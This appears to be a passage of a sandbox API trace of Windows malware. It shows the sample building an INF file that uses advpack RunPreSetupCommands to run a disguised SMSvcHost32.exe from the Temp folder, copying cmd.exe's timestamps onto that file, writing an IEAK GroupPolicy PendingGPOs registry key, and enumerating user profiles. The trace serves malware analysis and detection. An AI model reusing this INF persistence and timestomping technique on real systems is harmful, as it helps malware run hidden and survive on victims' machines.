	[0085.587] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.588] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.588] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.588] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.588] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.588] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.588] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.588] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.589] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.589] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.589] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.589] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.589] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.589] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.590] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.590] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.590] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.590] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.590] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.591] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.591] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.591] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.591] wsprintfW (in: param_1=0x7d0600, param_2="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = %s:2\r\n\r\n[%s]\r\n%s\r\n" | out: param_1="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = zgwexceeserwifggazpldiwsalkdbmefwodbbxguggfxocal:2\r\n\r\n[zgwexceeserwifggazpldiwsalkdbmefwodbbxguggfxocal]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 298
	[0085.591] lstrlenW (lpString="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = zgwexceeserwifggazpldiwsalkdbmefwodbbxguggfxocal:2\r\n\r\n[zgwexceeserwifggazpldiwsalkdbmefwodbbxguggfxocal]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 298
	[0085.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = zgwexceeserwifggazpldiwsalkdbmefwodbbxguggfxocal:2\r\n\r\n[zgwexceeserwifggazpldiwsalkdbmefwodbbxguggfxocal]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n", cchWideChar=-1, lpMultiByteStr=0x7d8cb8, cbMultiByte=598, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = zgwexceeserwifggazpldiwsalkdbmefwodbbxguggfxocal:2\r\n\r\n[zgwexceeserwifggazpldiwsalkdbmefwodbbxguggfxocal]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n", lpUsedDefaultChar=0x0) returned 299
	[0085.591] StrDupW (lpSrch="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0085.591] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35
	[0085.591] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x3991158, nSize=0x35 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf") returned 0x35
	[0085.592] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a0
	[0085.592] GetSystemTime (in: lpSystemTime=0x292fe54 | out: lpSystemTime=0x292fe54*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0xd, wHour=0xe, wMinute=0x1, wSecond=0x31, wMilliseconds=0x33f)) 
	[0085.592] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fe98 | out: lpFileTime=0x292fe98) returned 1
	[0085.592] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fea0 | out: lpFileTime=0x292fea0) returned 1
	[0085.592] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fea8 | out: lpFileTime=0x292fea8) returned 1
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.592] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.593] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] GetLastError () returned 0xb7
	[0085.594] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x1c
	[0085.594] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x3901fd8, nSize=0x1c | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c
	[0085.594] CreateFileW (lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x69c
	[0085.594] GetFileTime (in: hFile=0x3901fd8, lpCreationTime=0x292fe98, lpLastAccessTime=0x292fea0, lpLastWriteTime=0x292fea8 | out: lpCreationTime=0x292fe98*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastAccessTime=0x292fea0*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastWriteTime=0x292fea8*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2)) returned 0
	[0085.594] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fe98 | out: lpFileTime=0x292fe98) returned 1
	[0085.594] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fea0 | out: lpFileTime=0x292fea0) returned 1
	[0085.594] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fea8 | out: lpFileTime=0x292fea8) returned 1
	[0085.594] CloseHandle (hObject=0x69c) returned 1
	[0085.594] WriteFile (in: hFile=0x6a0, lpBuffer=0x7d8cb8*, nNumberOfBytesToWrite=0x12a, lpNumberOfBytesWritten=0x292feb0, lpOverlapped=0x0 | out: lpBuffer=0x7d8cb8*, lpNumberOfBytesWritten=0x292feb0*=0x12a, lpOverlapped=0x0) returned 1
	[0085.595] SetEndOfFile (hFile=0x6a0) returned 1
	[0085.595] SetFileTime (hFile=0x6a0, lpCreationTime=0x292fe98, lpLastAccessTime=0x292fea0, lpLastWriteTime=0x292fea8) returned 1
	[0085.595] FlushFileBuffers (hFile=0x6a0) returned 1
	[0085.596] CloseHandle (hObject=0x6a0) returned 1
	[0085.597] GetLastError () returned 0x6
	[0085.597] GetLastError () returned 0x6
	[0085.597] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.598] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.599] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.600] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.601] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.602] GetLastError () returned 0x6
	[0085.603] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf023f, lpSecurityAttributes=0x0, phkResult=0x292fd8c, lpdwDisposition=0x0 | out: phkResult=0x292fd8c*=0x0, lpdwDisposition=0x0) returned 0x5
	[0085.603] Sleep (dwMilliseconds=0xea60) 

Thread:
	id = 53
	os_tid = 0xd8c

	[0070.344] GetProfilesDirectoryW () returned 0x0
	[0070.345] GetProfilesDirectoryW () returned 0x1
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.345] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 0x726d80
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] GetLastError () returned 0x7a
	[0070.346] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0070.346] FindNextFileW (in: hFindFile=0x726d80, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] lstrcmpW (lpString1="..", lpString2=".") returned 1
	[0070.347] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0070.347] FindNextFileW (in: hFindFile=0x726d80, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] GetLastError () returned 0x7a
	[0070.347] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0070.347] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
	[0070.348] GetLastError () returned 0x7a
